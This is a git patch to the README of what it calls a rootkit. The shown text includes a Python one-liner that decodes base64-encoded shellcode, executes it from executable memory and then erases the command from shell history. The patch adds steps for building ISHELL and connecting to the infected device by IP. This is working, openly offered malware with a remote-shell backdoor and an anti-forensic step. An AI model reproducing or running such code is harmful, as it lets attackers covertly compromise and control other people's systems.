From 78dc738ad465e48e954b9b8321cea6c4a97a4c2e Mon Sep 17 00:00:00 2001
From: mephistolist <49227141+mephistolist@users.noreply.github.com>
Date: Wed, 9 Oct 2024 06:03:09 +0000
Subject: [PATCH] Update README.md

---
 README.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/README.md b/README.md
index 5874e83..7e0906a 100644
--- a/README.md
+++ b/README.md
@@ -10,3 +10,5 @@ You can run the entire rootkit from the command-line like so:
 ```
 python3 -c 'import base64, mmap, ctypes; encoded_shellcode = "SDHJSIHp9////0iNBe////9Iu6ajGtSlB5bkSDFYJ0gt+P///+L07hs1tsxpuZfOo4OE8VjEgs6OeYD7VX75pqMa+81o+4GJ03LnlnW5rfXrX5jpKuDUiJE1vdZv8uTw9E6KzzzO66OjGtSlB5bk"; shellcode = base64.b64decode(encoded_shellcode); mem = mmap.mmap(-1, len(shellcode), mmap.MAP_PRIVATE | mmap.MAP_ANONYMOUS, mmap.PROT_WRITE | mmap.PROT_READ | mmap.PROT_EXEC); mem.write(shellcode); addr = ctypes.addressof(ctypes.c_char.from_buffer(mem)); shell_func = ctypes.CFUNCTYPE(None)(addr); print("... and I won’t have to send a second."); shell_func()' && history -d $(history | awk 'END { print $1 }')
 ```
+
+From there you may go into the ISHELL-v0.3 folder and type 'make linux' to build ish. Then you may run ish with the ip of the device the rootkit was ran on to connect.